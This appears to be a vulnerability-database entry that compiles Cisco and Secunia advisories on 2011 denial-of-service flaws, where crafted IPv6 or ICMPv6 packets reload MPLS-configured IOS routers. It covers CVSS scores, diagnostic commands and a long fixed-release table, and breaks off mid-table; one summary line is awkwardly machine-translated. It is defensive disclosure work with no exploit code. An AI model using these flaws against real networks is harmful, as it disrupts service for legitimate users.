is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-July-29 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:
http://www.cisco.com/go/psirt
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)
iFcDBQFOMrmnQXnnBKKRMNARCE5CAP9TjtNJudeQVXIBi+RXClP25IBQ+4ONAT6S
bZTKB2cYtQD/W8gzsL8LTFg+yjVXhMQ2wzttSqHcKvsTjAfmJYTR+wY=
=2sNt
-----END PGP SIGNATURE-----
| VAR-201110-0250 | CVE-2011-3282 |
Cisco IOS and IOS XE Service disruption in (DoS) Vulnerabilities
Related entries in the VARIoT exploits database: VAR-E-201109-0355 |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in Cisco IOS 12.2SRE before 12.2(33)SRE4, 15.0, and 15.1, and IOS XE 2.1.x through 3.3.x, when an MPLS domain is configured, allows remote attackers to cause a denial of service (device reload) via an ICMPv6 packet, related to an expired MPLS TTL, aka Bug ID CSCtj30155. The problem is Bug ID CSCtj30155 It is a problem.By a third party ICMPv6 Service disruption via packets ( Reload device ) There is a possibility of being put into a state. Cisco IOS is prone to multiple remote denial-of-service vulnerabilities.
An attacker can exploit these issues to cause an affected device to reload, denying service to legitimate users.
These issues are being tracked by Cisco Bug IDs:
CSCto07919
CSCtj30155. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach?
Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM:
http://secunia.com/products/corporate/vim/ovum_2011_request/
----------------------------------------------------------------------
TITLE:
Cisco IOS MPLS IPv6 and ICMPv6 Packet Processing Two Denial of
Service Vulnerabilities
SECUNIA ADVISORY ID:
SA46145
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/46145/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=46145
RELEASE DATE:
2011-10-31
DISCUSS ADVISORY:
http://secunia.com/advisories/46145/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/46145/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46145
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in Cisco IOS, which can be
exploited by malicious people to cause a DoS (Denial of Service).
Please see the vendor's advisory for a list of affected versions.
SOLUTION:
Update to a fixed version (please see the vendor's advisory for
details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20110928-ipv6mpls.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
For more information:
SA46145
The vulnerabilities are reported in versions 2.1.x through 2.6.x and
3.2.xS. These
vulnerabilities are:
* Crafted IPv6 Packet May Cause MPLS-Configured Device to Reload
* ICMPv6 Packet May Cause MPLS-Configured Device to Reload
Cisco has released free software updates that address these
vulnerabilities.
Workarounds that mitigate these vulnerabilities are available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20110928-ipv6mpls.shtml.
Note: The September 28, 2011, Cisco IOS Software Security Advisory
bundled publication includes ten Cisco Security Advisories. Each advisory lists the Cisco IOS Software releases that
correct the vulnerability or vulnerabilities detailed in the advisory as
well as the Cisco IOS Software releases that correct all vulnerabilities
in the September 2011 Bundled Publication.
Individual publication links are in "Cisco Event Response: Semiannual
Cisco IOS Software Security Advisory Bundled Publication" at the
following link:
http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep11.html
Affected Products
=================
Vulnerable Products
+------------------
Cisco IOS Software or Cisco IOS XE Software devices (hereafter both
referenced as Cisco IOS Software in this document) that are running
vulnerable versions of Cisco IOS Software and configured for MPLS are
affected by two vulnerabilities related to IPv6 traffic that
traverses an MPLS domain. The two vulnerabilities are independent of
each other.
Note: IPv6 does not need to be configured on the affected devices
themselves. The vulnerabilities do require the MPLS label switched
packets to have specific IPv6 payloads to be exploited.
To determine whether a device is configured for MPLS, log in to the
device and issue the command-line interface (CLI) command "show mpls
interface". If the IP state is "Yes", the device is vulnerable. The
following example shows a device that has MPLS configured on
interface Ethernet0/0:
Router#show mpls interface
Interface IP Tunnel BGP Static Operational
Ethernet0/0 Yes (ldp) No No No Yes
Router#
The following two examples show responses from a device with MPLS
forwarding disabled. The first example shows a return of no
interfaces:
router#show mpls interface
Interface IP Tunnel BGP Static Operational
routers#
In the second example, the device provides a message indicating that
MPLS forwarding is not configured:
router#show mpls interface
no MPLS apps enabled or MPLS not enabled on any interfaces
router#
To determine the Cisco IOS Software release that is running on a Cisco
product, administrators can log in to the device and issue the "show
version" command to display the system banner. The system banner
confirms that the device is running Cisco IOS Software by displaying
text similar to "Cisco Internetwork Operating System Software" or "Cisco
IOS Software." The image name displays in parentheses, followed by
"Version" and the Cisco IOS Software release name. Other Cisco devices
do not have the "show version" command or may provide different output.
The following example identifies a Cisco product that is running
Cisco IOS Software Release 15.0(1)M1 with an installed image name of
C3900-UNIVERSALK9-M:
Router> show version
Cisco IOS Software, C3900 Software (C3900-UNIVERSALK9-M), Version 15.0(1)M1, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2009 by Cisco Systems, Inc.
Compiled Wed 02-Dec-09 17:17 by prod_rel_team
!--- output truncated
Additional information about Cisco IOS Software
release naming conventions is available in the white
paper Cisco IOS and NX-OS Software Reference Guide at
http://www.cisco.com/web/about/security/intelligence/ios-ref.html.
Products Confirmed Not Vulnerable
+--------------------------------
Devices that are not configured for MPLS are not vulnerable.
Details
=======
The packet handling nodes in an MPLS network are called provider
routers (P routers) and provider edge routers (PE routers) and are
configured with MPLS. Both P and PE routers are vulnerable to both
the vulnerabilities disclosed in this advisory.
In networks that have MPLS enabled and could carry MPLS label
switched packets with IPv6 payloads, the device may crash when
processing MPLS label switched packets with specific IPv6 payloads.
Typical deployment scenarios that would be affected by either
vulnerability would be Cisco IPv6 Provider Edge Router (6PE) or IPv6
VPN Provider Edge Router (6VPE).
The crafted packet used to exploit this vulnerability would be
silently discarded in Cisco IOS Software if received on an interface
where the packet did not have an MPLS label.
This vulnerability is documented in Cisco bug ID CSCto07919 and has been
assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2011-3274.
The packet used to exploit this vulnerability would not affect Cisco
IOS Software if received on an interface where the packet did not
have an MPLS label.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCto07919 ("Crafted IPv6 packet may cause MPLS configured device to
reload")
CVSS Base Score - 6.1
Access Vector - Adjacent Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 5.0
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtj30155 ("ICMPv6 packet may cause MPLS configured device to
reload")
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of these vulnerabilities may cause the device
to reload. Repeated exploitation could result in a sustained denial
of service condition.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Additionally, the Cisco IOS Software Checker is available on
the Cisco Security Intelligence Operations (SIO) portal at
http://tools.cisco.com/security/center/selectIOSVersion.x. It provides
several features for checking which Security Advisories affect specified
versions of Cisco IOS Software.
Cisco IOS Software
+-----------------
Each row of the following Cisco IOS Software table corresponds to a
Cisco IOS Software train. If a particular train is vulnerable, the
earliest releases that contain the fix are listed in the First Fixed
Release For This Advisory column. The First Fixed Release for All
Advisories in the September 2011 Bundled Publication column lists the
earliest possible releases that correct all the published
vulnerabilities in the Cisco IOS Software Security Advisory bundled
publication. Cisco recommends upgrading to the latest available
release, where possible.
+------------------------------------------------------------+
| Major | Availability of Repaired Releases |
| Release | |
|------------+-----------------------------------------------|
| Affected | | First Fixed Release |
| 12.0-Based | First Fixed Release | for All Advisories in |
| Releases | For This Advisory | the September 2011 |
| | | Bundled Publication |
|------------------------------------------------------------|
| There are no affected 12.0-based releases |
|------------------------------------------------------------|
| Affected | | First Fixed Release |
| 12.1-Based | First Fixed Release | for All Advisories in |
| Releases | For This Advisory | the September 2011 |
| | | Bundled Publication |
|------------+-----------------------+-----------------------|
| 12.1E | Not vulnerable | 12.2(18)SXF17b |
|------------+-----------------------+-----------------------|
| Affected | | First Fixed Release |
| 12.2-Based | First Fixed Release | for All Advisories in |
| Releases | For This Advisory | the September 2011 |
| | | Bundled Publication |
|------------+-----------------------+-----------------------|
| 12.2 | Not vulnerable | Vulnerable; first |
| | | fixed in Release 12.4 |
|------------+-----------------------+-----------------------|
| 12.2B | Not vulnerable | Vulnerable; first |
| | | fixed in Release 12.4 |
|------------+-----------------------+-----------------------|
| 12.2BC | Not vulnerable | Vulnerable; first |
| | | fixed in Release 12.4 |
|------------+-----------------------+-----------------------|
| 12.2BW | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2BX | Not vulnerable | fixed in Release |
| | | 12.2SB |
|------------+-----------------------+-----------------------|
| 12.2BY | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2BZ | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2CX | Not vulnerable | Vulnerable; first |
| | | fixed in Release 12.4 |
|------------+-----------------------+-----------------------|
| 12.2CY | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2CZ | Not vulnerable | fixed in Release |
| | | 12.2SB |
|------------+-----------------------+-----------------------|
| 12.2DA | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2DD | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2DX | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2EU | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| | | Releases up to and |
| 12.2EW | Not vulnerable | including 12.2(20)EW4 |
| | | are not vulnerable. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2EWA | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| 12.2EX | Not vulnerable | 12.2(55)EX3 |
|------------+-----------------------+-----------------------|
| 12.2EY | Not vulnerable | 12.2(58)EY |
|------------+-----------------------+-----------------------|
| | | Vulnerable; migrate |
| 12.2EZ | Not vulnerable | to any release in |
| | | 15.0SE |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2FX | Not vulnerable | fixed in Release |
| | | 12.2SE |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2FY | Not vulnerable | fixed in Release |
| | | 12.2EX |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2FZ | Not vulnerable | fixed in Release |
| | | 12.2SE |
|------------+-----------------------+-----------------------|
| | | Vulnerable; migrate |
| 12.2IRA | Not vulnerable | to any release in |
| | | 12.2IRG |
|------------+-----------------------+-----------------------|
| | | Vulnerable; migrate |
| 12.2IRB | Not vulnerable | to any release in |
| | | 12.2IRG |
|------------+-----------------------+-----------------------|
| | | Vulnerable; migrate |
| 12.2IRC | Not vulnerable | to any release in |
| | | 12.2IRG |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2IRD | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2IRE | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; migrate |
| 12.2IRF | Not vulnerable | to any release in |
| | | 12.2IRG |
|------------+-----------------------+-----------------------|
| 12.2IRG | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2IXA | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2IXB | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2IXC | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2IXD | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2IXE | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2IXF | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2IXG | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2IXH | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| 12.2JA | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2JK | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2MB | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2MC | Not vulnerable | Vulnerable; first |
| | | fixed in Release 12.4 |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2MRA | Not vulnerable | fixed in Release |
| | | 12.2SRD |
|------------+-----------------------+-----------------------|
| 12.2MRB | Not vulnerable | 12.2(33)MRB5 |
|------------+-----------------------+-----------------------|
| | | Releases prior to |
| | | 12.2(30)S are |
| | | vulnerable; Releases |
| 12.2S | Not vulnerable | 12.2(30)S and later |
| | | are not vulnerable. |
| | | First fixed in |
| | | Release 12.2SB |
|------------+-----------------------+-----------------------|
| | | 12.2(31)SB20 |
| 12.2SB | Not vulnerable | |
| | | 12.2(33)SB10 |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2SBC | Not vulnerable | fixed in Release |
| | | 12.2SB |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2SCA | Not vulnerable | fixed in Release |
| | | 12.2SCC |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2SCB | Not vulnerable | fixed in Release |
| | | 12.2SCC |
|------------+-----------------------+-----------------------|
| 12.2SCC | Not vulnerable | 12.2(33)SCC7 |
|------------+-----------------------+-----------------------|
| 12.2SCD | Not vulnerable | 12.2(33)SCD6 |
|------------+-----------------------+-----------------------|
| | | 12.2(33)SCE1 |
| 12.2SCE | Not vulnerable | |
| | | 12.2(33)SCE2 |
|------------+-----------------------+-----------------------|
| 12.2SCF | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| | | 12.2(55)SE3 |
| 12.2SE | Not vulnerable | |
| | | 12.2(58)SE |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2SEA | Not vulnerable | fixed in Release |
| | | 12.2SE |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2SEB | Not vulnerable | fixed in Release |
| | | 12.2SE |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2SEC | Not vulnerable | fixed in Release |
| | | 12.2SE |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2SED | Not vulnerable | fixed in Release |
| | | 12.2SE |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2SEE | Not vulnerable | fixed in Release |
| | | 12.2SE |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2SEF | Not vulnerable | fixed in Release |
| | | 12.2SE |
|------------+-----------------------+-----------------------|
| | | Releases prior to |
| | | 12.2(25)SEG4 are |
| | | vulnerable; Releases |
| 12.2SEG | Not vulnerable | 12.2(25)SEG4 and |
| | | later are not |
| | | vulnerable. First |
| | | fixed in Release |
| | | 12.2EX |
|------------+-----------------------+-----------------------|
| | | Releases prior to |
| | | 12.2(53)SG4 are |
| 12.2SG | Not vulnerable | vulnerable; Releases |
| | | 12.2(53)SG4 and later |
| | | are not vulnerable. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2SGA | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| 12.2SL | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2SM | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| 12.2SO | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2SQ | Not vulnerable | 12.2(50)SQ3 |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2SRA | Not vulnerable | fixed in Release |
| | | 12.2SRD |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2SRB | Not vulnerable | fixed in Release |
| | | 12.2SRD |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2SRC | Not vulnerable | fixed in Release |
| | | 12.2SRD |
|------------+-----------------------+-----------------------|
| 12.2SRD | Not vulnerable | 12.2(33)SRD6 |
|------------+-----------------------+-----------------------|
| 12.2SRE | 12.2(33)SRE4 | 12.2(33)SRE4 |
|------------+-----------------------+-----------------------|
| 12.2STE | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2SU | Not vulnerable | Vulnerable; first |
| | | fixed in Release 12.4 |
|------------+-----------------------+-----------------------|
| | | Releases prior to |
| | | 12.2(29a)SV are |
| | | vulnerable; Releases |
| 12.2SV | Not vulnerable | 12.2(29a)SV and later |
| | | are not vulnerable. |
| | | Migrate to any |
| | | release in 12.2SVD |
|------------+-----------------------+-----------------------|
| 12.2SVA | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2SVC | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2SVD | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2SVE | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2SW | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2SX | Not vulnerable | fixed in Release |
| | | 12.2SXF |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2SXA | Not vulnerable | fixed in Release |
| | | 12.2SXF |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2SXB | Not vulnerable | fixed in Release |
| | | 12.2SXF |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2SXD | Not vulnerable | fixed in Release |
| | | 12.2SXF |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2SXE | Not vulnerable | fixed in Release |
| | | 12.2SXF |
|------------+-----------------------+-----------------------|
| 12.2SXF | Not vulnerable | 12.2(18)SXF17b |
|------------+-----------------------+-----------------------|
| 12.2SXH | Not vulnerable | 12.2(33)SXH8a |
|------------+-----------------------+-----------------------|
| 12.2SXI | Not vulnerable | 12.2(33)SXI6 |
|------------+-----------------------+-----------------------|
| 12.2SXJ | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2SY | Not vulnerable | 12.2(50)SY |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2SZ | Not vulnerable | fixed in Release |
| | | 12.2SB |
|------------+-----------------------+-----------------------|
| 12.2T | Not vulnerable | Vulnerable; first |
| | | fixed in Release 12.4 |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2TPC | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| 12.2XA | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XB | Not vulnerable | Vulnerable; first |
| | | fixed in Release 12.4 |
|------------+-----------------------+-----------------------|
| 12.2XC | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XD | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XE | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XF | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XG | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XH | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XI | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XJ | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XK | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XL | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XM | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XN | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XNA | See Cisco IOS-XE | See Cisco IOS-XE |
| | Software Availability | Software Availability |
|------------+-----------------------+-----------------------|
| 12.2XNB | See Cisco IOS-XE | See Cisco IOS-XE |
| | Software Availability | Software Availability |
|------------+-----------------------+-----------------------|
| 12.2XNC | See Cisco IOS-XE | See Cisco IOS-XE |
| | Software Availability | Software Availability |
|------------+-----------------------+-----------------------|
| 12.2XND | See Cisco IOS-XE | See Cisco IOS-XE |
| | Software Availability | Software Availability |
|------------+-----------------------+-----------------------|
| 12.2XNE | See Cisco IOS-XE | See Cisco IOS-XE |
| | Software Availability | Software Availability |
|------------+-----------------------+-----------------------|
| 12.2XNF | See Cisco IOS-XE | See Cisco IOS-XE |
| | Software Availability | Software Availability |
|------------+-----------------------+-----------------------|
| | | Releases prior to |
| | | 12.2(54)XO are |
| 12.2XO | Not vulnerable | vulnerable; Releases |
| | | 12.2(54)XO and later |
| | | are not vulnerable. |
|------------+-----------------------+-----------------------|
| 12.2XQ | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XR | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XS | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XT | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XU | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XV | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2XW | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2YA | Not vulnerable | Vulnerable; first |
| | | fixed in Release 12.4 |
|------------+-----------------------+-----------------------|
| 12.2YB | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2YC | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2YD | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2YE | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2YF | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2YG | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2YH | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2YJ | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| 12.2YK | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2YL | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| 12.2YM | Not vulnerable | Vulnerable; first |
| | | fixed in Release 12.4 |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2YN | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| 12.2YO | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2YP | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2YQ | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2YR | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2YS | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2YT | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2YU | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
